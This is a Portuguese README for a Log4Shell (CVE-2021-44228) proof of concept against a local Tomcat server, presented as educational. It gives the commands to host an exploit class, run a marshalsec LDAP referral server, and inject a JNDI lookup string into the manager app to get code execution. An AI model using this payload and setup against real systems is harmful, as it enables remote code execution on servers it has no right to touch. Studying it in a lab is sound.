
POC da vulnerabilidade CVE-2021-44228 do Log4j2 no Apache Tomcat

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Insira ${jndi:ldap://127.0.0.1:1389/Exploit} no campo 'Caminho do arquivo de configuração XML' dentro do aplicativo gerenciador em http://localhost:8080/manager/html
A classe de exploração é carregada e o RCE é executado (o aplicativo Calculadora será aberto)
Este repositório é apenas uma POC feita para fins educacionais. O proprietário do repositório não se responsabiliza por quaisquer danos causados. Como nota moral, não seja mau.
Exploração LDAP https://github.com/mbechler/marshalsec